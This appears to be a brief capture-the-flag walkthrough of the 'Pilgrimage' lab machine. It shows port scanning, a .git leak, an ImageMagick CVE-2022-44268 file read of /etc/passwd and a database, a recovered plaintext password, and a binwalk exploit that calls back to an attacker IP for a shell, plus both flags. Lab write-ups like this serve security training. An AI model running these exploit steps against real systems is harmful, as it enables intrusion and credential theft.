Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.219 | TCP:22,80 |
$ ip='10.10.11.219'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20be60d295f628c1b7e9e81706f168f3 (RSA)
| 256 0eb6a6a8c99b4173746e70180d5fe0af (ECDSA)
|_ 256 d14e293c708669b4d72cc80b486e9804 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
.Git leak && ImageMagick 7.1.0 LFI
# echo '10.10.11.219 pilgrimage.htb'>>/etc/hosts
$ feroxbuster -u 'http://pilgrimage.htb'
http://pilgrimage.htb/
$ githack http://pilgrimage.htb/.git
$ ./magick --version
https://github.com/voidz0r/CVE-2022-44268
$ cargo run "/etc/passwd"
$ convert image.png -resize 50% output.png
上传图片
$ identify -verbose 67aadcf584baa.png
username:emily
$ python3 -c 'with open("hex", "rb") as f: open("dmp.db", "wb").write(bytes.fromhex(f.read().decode()))'
$ sqlite3 dmp.db
sqlite> select * from users
password:abigchonkyboi123
User.txt
715cf7707976d6d4f99e0b2e5c72f5ba
Privilege Escalation:binwalk v2.3.2
$ /usr/local/bin/binwalk
https://www.exploit-db.com/exploits/51249
$ python3 exp.py 67aadcf584baa.png 10.10.16.28 10033
Root.txt
d1c4c05c4039ed97c27b001ed3c8b8c8